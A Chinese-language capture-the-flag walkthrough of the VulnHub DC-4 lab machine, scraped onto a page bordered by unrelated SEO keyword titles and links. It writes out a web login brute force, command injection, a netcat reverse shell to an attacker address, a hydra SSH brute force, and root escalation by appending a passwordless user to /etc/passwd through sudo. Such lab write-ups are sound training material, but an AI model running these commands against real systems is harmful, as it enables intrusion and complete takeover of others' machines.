当前位置: 首页 > wzjs >正文

网站开发外包业务怎么接百度竞价推广技巧

网站开发外包业务怎么接,百度竞价推广技巧,做淘宝客怎么建网站,自己网站给别人网站做外链下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag

http://www.dtcms.com/wzjs/362831.html

相关文章:

  • 电商专业网站建设的毕业设计做个公司网站一般需要多少钱
  • 用服务器ip做网站域名百度推广工具有哪些
  • 网站seo怎样做抖音关键词挖掘工具
  • 手工制作教程视频教程成都最好的网站推广优化公司
  • 给公司网站做seo的好处东营网站建设制作
  • 做游戏网站用什么软件怎么推广产品最有效
  • 郑州交友网站建设嘉兴网站建设方案优化
  • 自己做购物网站好吗代写平台
  • 网站建设上传宝贝xamp爱站网排行榜
  • 合肥做微网站网络推广网站公司
  • 国外做的比较的ppt网站有哪些方面免费python在线网站
  • 网站制作 招聘seo网站推广软件
  • 荆州市做网站的国际大新闻最新消息
  • 怎么形容网站做的好怎么做优化
  • 做下载网站有哪些建网站软件工具
  • 网站制作需要哪些软件成人专业技能培训机构
  • 网站建设的进度杭州seo整站优化
  • 在线做网站午夜伦理长沙网络推广服务
  • 教学网站建设论文如何做网站搜索引擎优化
  • 微网站开发项目合作协议seo的优缺点
  • 五月色做受网站百度网站入口链接
  • 北仑网站建设网站aso优化
  • 江津网站建设方案发帖百度秒收录网站分享
  • 如何做好宣传推广长沙seo搜索
  • 娄底做网站东莞网站优化
  • 盐城市网站建设公司百度搜索引擎的优缺点
  • 邢台提供网站建设公司电话营销型企业网站案例
  • 广州成亿网络如何对一个网站进行seo
  • 怎么做网站转让机制 银行账户对接网站排名top排行榜
  • 做网站用国内还是国外的vpsseo兼职平台